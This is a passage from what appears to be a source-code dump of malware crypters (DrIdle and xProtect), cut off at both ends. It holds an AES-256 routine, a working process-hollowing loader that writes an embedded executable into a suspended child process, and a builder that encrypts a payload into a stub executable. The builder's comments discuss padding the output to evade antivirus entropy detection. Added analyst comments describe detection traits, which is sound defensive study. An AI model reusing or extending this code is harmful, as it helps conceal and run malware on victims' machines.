        const uint8_t odd = sum ^ rj_xtime(rj_xtime(dbl ^ b ^ d));

        s[0] ^= even ^ rj_xtime(a ^ b);
        s[1] ^= odd ^ rj_xtime(b ^ c);
        s[2] ^= even ^ rj_xtime(c ^ d);
        s[3] ^= odd ^ rj_xtime(d ^ a);
    }
} /* aes_mixColumns_inv */
251 |
252 | /* -------------------------------------------------------------------------- */
/*
 * Advance the 32-byte working key `k` by one key-schedule step, in place,
 * and step the round constant `*rc` forward with F().
 */
void aes_expandEncKey(uint8_t *k, uint8_t *rc)
{
    uint8_t n;

    /* first word: substituted, rotated last word plus the round constant */
    k[0] ^= rj_sbox(k[29]) ^ (*rc);
    k[1] ^= rj_sbox(k[30]);
    k[2] ^= rj_sbox(k[31]);
    k[3] ^= rj_sbox(k[28]);
    *rc = F(*rc);

    /* bytes 4..15: each byte absorbs the (already updated) byte 4 below it */
    for (n = 4; n < 16; n++) {
        k[n] ^= k[n - 4];
    }

    /* bytes 16..19: substituted copy of bytes 12..15, no rotation */
    for (n = 16; n < 20; n++) {
        k[n] ^= rj_sbox(k[n - 4]);
    }

    /* bytes 20..31: same chaining as the lower half */
    for (n = 20; n < 32; n++) {
        k[n] ^= k[n - 4];
    }
} /* aes_expandEncKey */
274 |
275 | /* -------------------------------------------------------------------------- */
/*
 * Step the 32-byte working key `k` one key-schedule step backwards, in
 * place, and step the round constant `*rc` backwards with FD(). The stages
 * run in the reverse order of aes_expandEncKey.
 */
void aes_expandDecKey(uint8_t *k, uint8_t *rc)
{
    uint8_t n;

    /* bytes 31..20: walk downwards so each byte reads a not-yet-undone
     * neighbour 4 below it */
    for (n = 31; n >= 20; n--) {
        k[n] ^= k[n - 4];
    }

    /* bytes 16..19: remove the substituted copy of bytes 12..15 */
    for (n = 16; n < 20; n++) {
        k[n] ^= rj_sbox(k[n - 4]);
    }

    /* bytes 15..4: same downward walk for the lower half */
    for (n = 15; n >= 4; n--) {
        k[n] ^= k[n - 4];
    }

    /* first word: the round constant is stepped back before it is used */
    *rc = FD(*rc);
    k[0] ^= rj_sbox(k[29]) ^ (*rc);
    k[1] ^= rj_sbox(k[30]);
    k[2] ^= rj_sbox(k[31]);
    k[3] ^= rj_sbox(k[28]);
} /* aes_expandDecKey */
297 |
298 |
299 | /* -------------------------------------------------------------------------- */
/*
 * Load a 32-byte key into the context. enckey keeps the key as supplied;
 * deckey starts as the same bytes and is then run through seven
 * aes_expandEncKey steps, which is the state aes256_decrypt_ecb starts from.
 * ctx->key is not written here.
 */
void aes256_init(aes256_context *ctx, uint8_t *k)
{
    uint8_t rcon = 1;
    uint8_t idx;
    uint8_t step;

    for (idx = 0; idx < sizeof(ctx->key); idx++) {
        const uint8_t byte = k[idx];

        ctx->deckey[idx] = byte;
        ctx->enckey[idx] = byte;
    }

    for (step = 0; step < 7; step++) {
        aes_expandEncKey(ctx->deckey, &rcon);
    }
} /* aes256_init */
308 |
309 | /* -------------------------------------------------------------------------- */
/*
 * Overwrite the three 32-byte key buffers in the context (key, enckey,
 * deckey) with zeros.
 */
void aes256_done(aes256_context *ctx)
{
    uint8_t idx = 0;

    while (idx < sizeof(ctx->key)) {
        ctx->deckey[idx] = 0;
        ctx->enckey[idx] = 0;
        ctx->key[idx] = 0;
        idx++;
    }
} /* aes256_done */
317 |
318 | /* -------------------------------------------------------------------------- */
/*
 * Encrypt one 16-byte block in place. The working key in ctx->key is
 * reloaded from ctx->enckey on every call and expanded as the rounds go.
 *
 * This is raw single-block ECB: there is no IV and no chaining, so equal
 * input blocks under one key give equal output blocks.
 */
void aes256_encrypt_ecb(aes256_context *ctx, uint8_t *buf)
{
    uint8_t rcon = 1;
    uint8_t round;

    aes_addRoundKey_cpy(buf, ctx->enckey, ctx->key);

    for (round = 1; round < 14; ++round) {
        aes_subBytes(buf);
        aes_shiftRows(buf);
        aes_mixColumns(buf);

        if ((round & 1) == 0) {
            /* even round: derive the next 32 key bytes, use the lower half */
            aes_expandEncKey(ctx->key, &rcon);
            aes_addRoundKey(buf, ctx->key);
        } else {
            /* odd round: use the upper half of the current key bytes */
            aes_addRoundKey(buf, &ctx->key[16]);
        }
    }

    /* final round has no MixColumns */
    aes_subBytes(buf);
    aes_shiftRows(buf);
    aes_expandEncKey(ctx->key, &rcon);
    aes_addRoundKey(buf, ctx->key);
} /* aes256_encrypt_ecb */
337 |
338 | /* -------------------------------------------------------------------------- */
/*
 * Decrypt one 16-byte block in place. The working key in ctx->key is
 * reloaded from ctx->deckey on every call and stepped backwards with
 * aes_expandDecKey as the rounds go.
 *
 * This is raw single-block ECB: there is no IV and no chaining, so equal
 * ciphertext blocks under one key decrypt to equal plaintext blocks.
 */
void aes256_decrypt_ecb(aes256_context *ctx, uint8_t *buf)
{
    uint8_t rcon = 0x80;
    uint8_t round;

    aes_addRoundKey_cpy(buf, ctx->deckey, ctx->key);
    aes_shiftRows_inv(buf);
    aes_subBytes_inv(buf);

    for (round = 13; round >= 1; round--) {
        if ((round & 1) != 0) {
            /* odd round: step the key back first, then use its upper half */
            aes_expandDecKey(ctx->key, &rcon);
            aes_addRoundKey(buf, &ctx->key[16]);
        } else {
            aes_addRoundKey(buf, ctx->key);
        }
        aes_mixColumns_inv(buf);
        aes_shiftRows_inv(buf);
        aes_subBytes_inv(buf);
    }

    aes_addRoundKey(buf, ctx->key);
} /* aes256_decrypt_ecb */
361 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/aes256.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Byte-oriented AES-256 implementation.
3 | * All lookup tables replaced with 'on the fly' calculations.
4 | *
5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com
6 | * Other contributors: Hal Finney
7 | *
8 | * Permission to use, copy, modify, and distribute this software for any
9 | * purpose with or without fee is hereby granted, provided that the above
10 | * copyright notice and this permission notice appear in all copies.
11 | *
12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
19 | */
20 | #ifndef uint8_t
21 | #define uint8_t unsigned char
22 | #endif
23 |
24 | #ifdef __cplusplus
25 | extern "C" {
26 | #endif
27 |
/*
 * AES-256 context, three 32-byte buffers:
 *   key    - working round-key buffer; the encrypt/decrypt routines reload it
 *            from enckey or deckey at the start of every block
 *   enckey - the 32-byte key as passed to aes256_init
 *   deckey - that key after seven aes_expandEncKey steps (filled in by
 *            aes256_init); decryption starts from this state
 */
typedef struct {
    uint8_t key[32];
    uint8_t enckey[32];
    uint8_t deckey[32];
} aes256_context;


/* Load a 32-byte key into the context. */
void aes256_init(aes256_context *, uint8_t * /* key */);
/* Zero all three key buffers in the context. */
void aes256_done(aes256_context *);
/* Encrypt exactly one 16-byte block in place (ECB: no IV, no chaining). */
void aes256_encrypt_ecb(aes256_context *, uint8_t * /* plaintext */);
/* Decrypt exactly one 16-byte block in place (ECB: no IV, no chaining). */
void aes256_decrypt_ecb(aes256_context *, uint8_t * /* ciphertext */);
39 |
40 | #ifdef __cplusplus
41 | }
42 | #endif
43 |
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/resourcemanager.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 | #include "Windows.h"
3 | #include "resourcemanager.h"
4 |
// Analyst note: this routine is a process-hollowing loader (MITRE ATT&CK
// T1055.012). It lays out the PE image at pImage in a local buffer, starts
// pPath as a suspended process, overwrites that process's memory at the
// image's preferred base and redirects the main thread to the new entry
// point. The code is 32-bit only as written (pointers cast to DWORD, Eax/Ebx
// context registers).
//
// Detection view: the API sequence below -- CreateProcess with
// CREATE_SUSPENDED, VirtualProtectEx to PAGE_EXECUTE_READWRITE, two
// WriteProcessMemory calls, SetThreadContext, ResumeThread, all against a
// freshly created child -- is the behaviour endpoint telemetry should flag,
// along with a child whose in-memory image no longer matches its file on
// disk.
void ResourceManager::RunFromMemory(unsigned char* pImage,char* pPath)
{
    DWORD dwWritten = 0;
    DWORD dwHeader = 0;
    DWORD dwImageSize = 0;
    DWORD dwSectionCount = 0;
    DWORD dwSectionSize = 0;
    DWORD firstSection = 0;
    DWORD previousProtection = 0;
    DWORD jmpSize = 0;

    IMAGE_NT_HEADERS INH;
    IMAGE_DOS_HEADER IDH;
    IMAGE_SECTION_HEADER Sections[1000];

    PROCESS_INFORMATION peProcessInformation;
    STARTUPINFO peStartUpInformation;
    CONTEXT pContext;
    SECURITY_ATTRIBUTES secAttrib;

    char* pMemory;
    char* pFile;
    // Read the DOS header, then the NT headers it points to via e_lfanew.
    memcpy(&IDH,pImage,sizeof(IDH));
    memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));

    // Local staging buffer sized from the header's SizeOfImage field.
    dwImageSize = INH.OptionalHeader.SizeOfImage;
    pMemory = (char*)malloc(dwImageSize);
    memset(pMemory,0,dwImageSize);
    pFile = pMemory;

    // Section table is taken from directly after the NT headers; the count
    // comes from the image's own NumberOfSections field.
    dwHeader = INH.OptionalHeader.SizeOfHeaders;
    firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
    memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);

    memcpy(pFile,pImage,dwHeader);

    // Advance past the headers, rounded up to SectionAlignment.
    if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders;
    }
    else
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
        jmpSize += 1;
        jmpSize *= INH.OptionalHeader.SectionAlignment;
    }

    pFile = (char*)((DWORD)pFile + jmpSize);

    // Copy each section's raw data one after another, advancing by its
    // VirtualSize rounded up to SectionAlignment.
    for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
    {
        jmpSize = 0;
        dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
        memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);

        if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
        }
        else
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);
    }


    memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
    memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
    memset(&pContext,0,sizeof(CONTEXT));

    peStartUpInformation.cb = sizeof(peStartUpInformation);
    // Host process is created suspended from pPath; the stub's WinMain
    // passes its own __argv[0], so the child carries the stub's image name.
    if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation))
    {
        pContext.ContextFlags = CONTEXT_FULL;
        GetThreadContext(peProcessInformation.hThread,&pContext);
        // Make the target range at ImageBase RWX, then overwrite it with the
        // staged image.
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
        // Writes the new image base at Ebx+8 (on a suspended x86 process Ebx
        // is expected to hold the PEB address, where offset 8 is the image
        // base field), then points Eax at the new entry point.
        pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
        SetThreadContext(peProcessInformation.hThread,&pContext);
        //VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
        ResumeThread(peProcessInformation.hThread);
    }
    free(pMemory);
}
93 |
// Looks up a resource in the running executable and returns a pointer to its bytes.
//
// resourceId     - integer resource name, wrapped with MAKEINTRESOURCE.
// resourceString - resource type string passed to FindResource.
// dwSize         - out: resource size in bytes on success, 0 on failure.
// Returns the pointer from LockResource, or NULL if FindResource, LoadResource
// or LockResource fails.
//
// NOTE(review): the caller is not visible here; in a stub like this the resource
// is presumably the embedded payload blob. For triage, an unusually large or
// high-entropy resource in a small executable is worth a closer look.
94 | unsigned char* ResourceManager::GetResource(int resourceId, char* resourceString, unsigned long* dwSize) {
95 | HGLOBAL hResData;
96 | HRSRC hResInfo;
97 | unsigned char* pvRes;
98 | HMODULE hModule = GetModuleHandle(NULL); // NULL => the image of the current process, i.e. the stub itself
99 |
100 | if (((hResInfo = FindResource(hModule, MAKEINTRESOURCE(resourceId), resourceString)) != NULL) &&
101 | ((hResData = LoadResource(hModule, hResInfo)) != NULL) &&
102 | ((pvRes = (unsigned char *)LockResource(hResData)) != NULL))
103 | {
104 | *dwSize = SizeofResource(hModule, hResInfo);
105 | return pvRes;
106 | }
107 |
108 | *dwSize = 0; // any failed step reports an empty resource
109 | return NULL;
110 | }
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/resourcemanager.h:
--------------------------------------------------------------------------------
// Helper class of the stub; both operations are static, so no instance state is involved.
1 | class ResourceManager
2 | {
3 | public:
4 | ResourceManager();
5 | virtual ~ResourceManager();
6 |
7 | public:
// Takes an in-memory PE image and a path. The visible tail of its definition in
// resourcemanager.cpp starts the process named by pPath suspended, writes the image
// into it and resumes it (process hollowing, MITRE ATT&CK T1055.012).
8 | static void RunFromMemory(unsigned char* pImage,char* pPath);
// Returns a pointer to a resource of the current executable; *dwSize receives its size (0 on failure).
9 | static unsigned char* GetResource(int resourceId, char* resourceString, unsigned long* dwSize);
10 | };
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/stdafx.cpp
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/stdafx.h
--------------------------------------------------------------------------------
/DrIdle_crypter/MyStub/MyStub/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/malwares/Crypters/681a9ddfd40e8618d93869735fef5b461edd6bde/DrIdle_crypter/MyStub/MyStub/targetver.h
--------------------------------------------------------------------------------
/xProtect Source/build.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | #include "stub.h"
5 |
// Address and virtual size of the builder's own ".stubc" (code) and ".stubd" (data)
// sections. All four stay 0 until GetStubSectionInfo() fills them in.
6 | DWORD dwStubCodeBase = 0;
7 | DWORD dwStubCodeSize = 0;
8 | DWORD dwStubDataBase = 0;
9 | DWORD dwStubDataSize = 0;
10 |
// Reads a whole file into a freshly allocated read/write buffer.
//
// szFileName - path of the file to read.
// dwSize     - out: file size as reported by GetFileSize.
// Returns the buffer (VirtualAlloc'd; CryptFile releases it with VirtualFree),
// or 0 if the file cannot be opened, is empty, or the allocation fails.
//
// NOTE(review): the two early returns after the open succeeded do not close hFile,
// and neither the ReadFile result nor dwRead is checked, so a failed or short read
// is returned to the caller as if it were the complete file.
11 | BYTE* ReadFileToMem( WCHAR* szFileName, DWORD& dwSize )
12 | {
13 | HANDLE hFile = CreateFile( szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL );
14 |
15 | if ( hFile == INVALID_HANDLE_VALUE )
16 | return 0;
17 |
18 | dwSize = GetFileSize( hFile, NULL ); // high DWORD of the size is ignored
19 |
20 | if ( !dwSize )
21 | return 0;
22 |
23 | BYTE* pFileBuffer = (BYTE*)VirtualAlloc( NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
24 |
25 | if ( !pFileBuffer )
26 | return 0;
27 |
28 | DWORD dwRead = 0;
29 | ReadFile( hFile, pFileBuffer, dwSize, &dwRead, NULL );
30 | CloseHandle( hFile );
31 |
32 | return pFileBuffer;
33 | }
34 |
// Fills the global bKey array with bytes taken from rand().
//
// rand() is not a cryptographic generator, and main.cpp seeds it with
// GetTickCount(). The key is also stored in the stub data of the output file
// (bKey is declared inside the .stubd segment), so an analyst can read it
// straight from a sample and does not need to recover the seed.
35 | void GenerateKey()
36 | {
37 | for ( int i = 0; i < sizeof( bKey ); i++ )
38 | {
39 | bKey[i] = (BYTE)rand(); // only the low byte of each rand() value is kept
40 | }
41 | }
42 |
// Heuristic rebasing of absolute addresses inside a copied code buffer.
//
// Every byte offset in [pBase, pBase + dwSize) is read as a DWORD; a value that
// falls in [dwOldBase, dwOldBase + dwSize) is rewritten to the same offset from
// dwNewBase. No relocation table is consulted, so any 4-byte pattern that happens
// to land in that range is rewritten as well.
//
// NOTE(review): the pointer/int casts make this 32-bit only, the last three
// iterations read (and may write) up to 3 bytes past the end of the buffer, and
// the same dwSize is used both as the scan length and as the size of the old
// address range.
43 | void FixAddress( BYTE* pBase, DWORD dwSize, DWORD dwOldBase, DWORD dwNewBase )
44 | {
45 | for ( int i = (int)pBase; i < (int)( pBase + dwSize ); i++ )
46 | {
47 | if ( *(DWORD*)i >= dwOldBase && *(DWORD*)i < ( dwOldBase + dwSize ) )
48 | {
49 | *(DWORD*)i -= dwOldBase;
50 | *(DWORD*)i += dwNewBase;
51 | }
52 | }
53 | }
54 |
// Locates the ".stubc" and ".stubd" sections of an already mapped PE image.
//
// dwCrypterBase - base address of the mapped image (CryptFile passes the
//                 builder's own module handle).
// Returns true when both sections were found with a non-zero address and size;
// the results are stored in dwStubCodeBase/Size and dwStubDataBase/Size.
// Returns false if the DOS or NT signature does not match or a section is missing.
//
// NOTE(review): memcmp compares 8 bytes against a 7-byte string literal
// (6 characters plus the terminator), i.e. one byte past the literal.
55 | bool GetStubSectionInfo( DWORD_PTR dwCrypterBase )
56 | {
57 | IMAGE_DOS_HEADER* pIDH = (IMAGE_DOS_HEADER*)dwCrypterBase;
58 | if ( pIDH->e_magic != IMAGE_DOS_SIGNATURE )
59 | return false;
60 |
61 | IMAGE_NT_HEADERS* pINH = (IMAGE_NT_HEADERS*)( dwCrypterBase + pIDH->e_lfanew );
62 | if ( pINH->Signature != IMAGE_NT_SIGNATURE )
63 | return false;
64 |
65 | IMAGE_SECTION_HEADER* pISH = IMAGE_FIRST_SECTION( pINH );
66 |
67 | for ( int i = 0; i < pINH->FileHeader.NumberOfSections; i++ )
68 | {
69 | if ( !memcmp( (char*)pISH[i].Name, ".stubc", 8 ) )
70 | {
71 | dwStubCodeBase = dwCrypterBase + pISH[i].VirtualAddress;
72 | dwStubCodeSize = pISH[i].Misc.VirtualSize;
73 | }
74 |
75 | if ( !memcmp( (char*)pISH[i].Name, ".stubd", 8 ) )
76 | {
77 | dwStubDataBase = dwCrypterBase + pISH[i].VirtualAddress;
78 | dwStubDataSize = pISH[i].Misc.VirtualSize;
79 | }
80 | }
81 |
82 | if ( dwStubCodeBase && dwStubCodeSize && dwStubDataBase && dwStubDataSize )
83 | return true;
84 | else
85 | return false;
86 | }
87 |
// Computes the size of dwIn bytes after the padding scheme used by InFile():
// one output byte per input byte, plus inc_multi extra bytes after every input
// index that is a multiple of inc_every (index 0 included).
//
// Returns the padded size. inc_every must be non-zero, since it is the divisor
// of the modulo below.
88 | int CalculateIncreasedSize( int dwIn, int inc_every, int inc_multi )
89 | {
90 | int iRet = 0;
91 |
92 | for ( int i = 0; i < dwIn; i++ )
93 | {
94 | iRet++;
95 |
96 | if ( i % inc_every == 0 )
97 | iRet += inc_multi;
98 | }
99 |
100 | return iRet;
101 | }
102 |
// Copies dwSize bytes from bIn to bOut, leaving a gap of inc_multi untouched
// bytes in bOut after every input index that is a multiple of inc_every.
//
// Returns the number of bytes of bOut covered (copied bytes plus gaps), which
// matches CalculateIncreasedSize(dwSize, inc_every, inc_multi). bOut must be at
// least that large; no bound is checked here. The gaps keep whatever bOut
// already contained (CryptFile zeroes the buffer first).
//
// For analysts: the stub's GetFile() is the inverse, so the interleaving is
// recoverable from the dwSplitIncrease/dwSplitMulti values in the stub data.
103 | int InFile( BYTE* bIn, BYTE* bOut, DWORD dwSize, int inc_every, int inc_multi )
104 | {
105 | int increased = 0;
106 |
107 | for ( int i = 0; i < dwSize; i++ )
108 | {
109 | *( bOut + increased ) = *( bIn + i );
110 | increased++;
111 |
112 | if ( i % inc_every == 0 )
113 | increased += inc_multi;
114 | }
115 |
116 | return increased;
117 | }
118 |
// Builder entry point: wraps the executable at szFilePath into a new PE that is
// written to "Crypted.exe" in the current directory (software packing, MITRE
// ATT&CK T1027.002).
//
// Steps, as visible below:
//   1. Read the input file and check its DOS and NT signatures.
//   2. Locate the builder's own .stubc/.stubd sections.
//   3. Generate bKey, transform the input with SIMPLE_ENCRYPT (bSkip = true) and
//      the span between dwEncryptStartMarker and dwEncryptEndMarker (bSkip = false).
//   4. Start from a copy of the builder's own NT headers, reset the DOS header,
//      zero the data directories and describe two sections: ".text" (stub code)
//      and ".data" (stub data followed by the transformed input).
//   5. Write headers, header padding, rebased stub code, then stub data + input.
//
// Returns true when the end of the sequence is reached, false on any early exit.
// WriteFile/SetFilePointer results are not checked.
//
// Static traits of the output that follow directly from this code and can be
// used for triage and detection:
//   - exactly two sections, named ".text" and ".data";
//   - e_lfanew == sizeof(IMAGE_DOS_HEADER), i.e. no DOS stub program;
//   - every data directory zeroed (no import table), except that entry 1 (the
//     import directory slot) carries VirtualAddress 0x41 with Size 0;
//   - GUI subsystem and SizeOfInitializedData == 0 despite a large ".data";
//   - DYNAMIC_BASE cleared and RELOCS_STRIPPED set if the builder had ASLR on;
//   - bKey is part of the stub data copied into ".data", so the embedded file
//     can be recovered statically from a sample.
119 | bool CryptFile( WCHAR* szFilePath )
120 | {
121 | bool bReturn = false;
122 |
123 | HANDLE hFile = CreateFile( L"Crypted.exe", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, 0 ); // fixed output name, relative to the working directory
124 |
125 | if ( hFile == INVALID_HANDLE_VALUE )
126 | return false;
127 |
128 | DWORD dwSize = 0;
129 | BYTE* pFileBuffer = ReadFileToMem( szFilePath, dwSize );
130 | dwFileSize = dwSize; // stored in the stub data so the stub knows the payload length
131 |
132 | if ( !pFileBuffer )
133 | {
134 | CloseHandle( hFile );
135 | return false;
136 | }
137 |
138 | IMAGE_DOS_HEADER stubIDH = { 0 };
139 | IMAGE_NT_HEADERS stubINH = { 0 };
140 | IMAGE_SECTION_HEADER stubISH[2] = { 0 };
141 | DWORD_PTR dwCrypterBase = (DWORD_PTR)GetModuleHandle( NULL ); // the builder's own mapped image
142 | DWORD dwBytesWritten = 0;
143 |
144 | //warning: using goto can cause dinosaur attacks, use at own risk
145 | //http://i.stack.imgur.com/6C1F5.png
146 |
147 | IMAGE_DOS_HEADER* pFileIDH = (IMAGE_DOS_HEADER*)pFileBuffer;
148 | if ( pFileIDH->e_magic != IMAGE_DOS_SIGNATURE )
149 | {
150 | wprintf( L"Not a PE File.\n" );
151 | goto clean_up;
152 | }
153 |
154 | IMAGE_NT_HEADERS* pFileINH = (IMAGE_NT_HEADERS*)( pFileBuffer + pFileIDH->e_lfanew ); // e_lfanew is not checked against dwSize
155 | if ( pFileINH->Signature != IMAGE_NT_SIGNATURE )
156 | {
157 | wprintf( L"Not a PE File.\n" );
158 | goto clean_up;
159 | }
160 |
161 | if ( !GetStubSectionInfo( dwCrypterBase ) )
162 | {
163 | wprintf( L"Couldn't find stub code/data section.\n" );
164 | goto clean_up;
165 | }
166 |
167 | GenerateKey();
168 | SIMPLE_ENCRYPT( pFileBuffer, dwSize, bKey, sizeof( bKey ), true ); // input file, only every third byte is transformed
169 | SIMPLE_ENCRYPT( (BYTE*)( (DWORD)&dwEncryptStartMarker ), ( (DWORD)&dwEncryptEndMarker - (DWORD)&dwEncryptStartMarker ), bKey, sizeof( bKey ), false ); // in-place on the builder's own stub data between the two markers
170 |
171 | stubIDH = *(IMAGE_DOS_HEADER*)dwCrypterBase;
172 | if ( stubIDH.e_magic != IMAGE_DOS_SIGNATURE ) //for good measure
173 | goto clean_up;
174 |
175 | stubINH = *(IMAGE_NT_HEADERS*)( dwCrypterBase + stubIDH.e_lfanew );
176 | if ( stubINH.Signature != IMAGE_NT_SIGNATURE ) //for good measure
177 | goto clean_up;
178 |
179 | memset( &stubIDH, 0, sizeof( IMAGE_DOS_HEADER ) );
180 | stubIDH.e_magic = IMAGE_DOS_SIGNATURE;
181 | stubIDH.e_lfanew = sizeof( IMAGE_DOS_HEADER ); // NT headers directly follow the DOS header
182 |
183 | memset( stubINH.OptionalHeader.DataDirectory, 0, sizeof( IMAGE_DATA_DIRECTORY ) * IMAGE_NUMBEROF_DIRECTORY_ENTRIES ); // no imports, exports, relocations or resources are declared
184 |
185 | if ( stubINH.OptionalHeader.DllCharacteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE )
186 | {
187 | wprintf( L"\n************************************************\n" );
188 | wprintf( L"Crypter has been compiled with ASLR, if crypted file doesn't work please turn ASLR off and compile again!\n" );
189 | wprintf( L"************************************************\n" );
190 |
191 | stubINH.OptionalHeader.DllCharacteristics &= ~IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE;
192 | stubINH.FileHeader.Characteristics |= IMAGE_FILE_RELOCS_STRIPPED;
193 | }
194 |
195 | //these will determine how much padding to add to crypted file (in case of entropy based detections, multiple AVs use these kinds of detections)
196 | //every inc_every add inc_multi
197 | const int inc_every = 3;
198 | const int inc_multi = 0; //0 = no increased size, increase this to add more size in case of entropy based detections
199 |
200 | dwSplitMulti = inc_multi;
201 | dwSplitIncrease = inc_every;
202 |
203 | dwPaddedFileSize = CalculateIncreasedSize( dwFileSize, inc_every, inc_multi );
204 |
205 | DWORD dwStubCodeTotal = dwStubCodeSize;
206 | DWORD dwStubDataTotal = dwStubDataSize + dwPaddedFileSize;
207 |
208 | char* szCode = ".text";
209 | char* szData = ".data";
210 |
211 | memcpy( stubISH[0].Name, szCode, strlen( szCode ) );
212 | stubISH[0].PointerToRawData = stubINH.OptionalHeader.SizeOfHeaders;
213 | stubISH[0].SizeOfRawData = Align( dwStubCodeTotal, stubINH.OptionalHeader.FileAlignment );
214 | stubISH[0].VirtualAddress = stubINH.OptionalHeader.SectionAlignment;
215 | stubISH[0].Misc.VirtualSize = dwStubCodeTotal;
216 | stubISH[0].Characteristics = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ;
217 |
218 | memcpy( stubISH[1].Name, szData, strlen( szData ) );
219 | stubISH[1].PointerToRawData = Align( stubISH[0].PointerToRawData + stubISH[0].SizeOfRawData, stubINH.OptionalHeader.FileAlignment );
220 | stubISH[1].SizeOfRawData = Align( dwStubDataTotal, stubINH.OptionalHeader.FileAlignment );
221 | stubISH[1].VirtualAddress = Align( stubISH[0].VirtualAddress + stubISH[0].Misc.VirtualSize, stubINH.OptionalHeader.SectionAlignment );
222 | stubISH[1].Misc.VirtualSize = dwStubDataTotal;
223 | stubISH[1].Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_INITIALIZED_DATA;
224 |
225 | stubINH.FileHeader.NumberOfSections = 2;
226 | stubINH.OptionalHeader.Subsystem = IMAGE_SUBSYSTEM_WINDOWS_GUI;
227 | stubINH.OptionalHeader.SizeOfInitializedData = 0;
228 | stubINH.OptionalHeader.SizeOfCode = stubISH[0].SizeOfRawData;
229 | stubINH.OptionalHeader.BaseOfData = stubISH[1].VirtualAddress;
230 | stubINH.OptionalHeader.SizeOfImage = Align( stubISH[1].VirtualAddress + stubISH[1].Misc.VirtualSize, stubINH.OptionalHeader.SectionAlignment );
231 | stubINH.OptionalHeader.AddressOfEntryPoint = stubISH[0].VirtualAddress + ( (DWORD_PTR)stub_start - dwStubCodeBase ); // entry point is stub_start inside the copied code section
232 |
233 | stubINH.OptionalHeader.DataDirectory[1].VirtualAddress = 0x41; // entry 1 is the import directory slot; its Size stays 0 from the memset above
234 |
235 | WriteFile( hFile, &stubIDH, sizeof( IMAGE_DOS_HEADER ), &dwBytesWritten, 0 );
236 | SetFilePointer( hFile, 0, 0, FILE_END );
237 | WriteFile( hFile, &stubINH, sizeof( IMAGE_NT_HEADERS ), &dwBytesWritten, 0 );
238 |
239 | for ( int i = 0; i < stubINH.FileHeader.NumberOfSections; i++ )
240 | {
241 | SetFilePointer( hFile, sizeof( IMAGE_DOS_HEADER ) + sizeof( IMAGE_NT_HEADERS ) + ( sizeof( IMAGE_SECTION_HEADER ) * i ), 0, FILE_BEGIN );
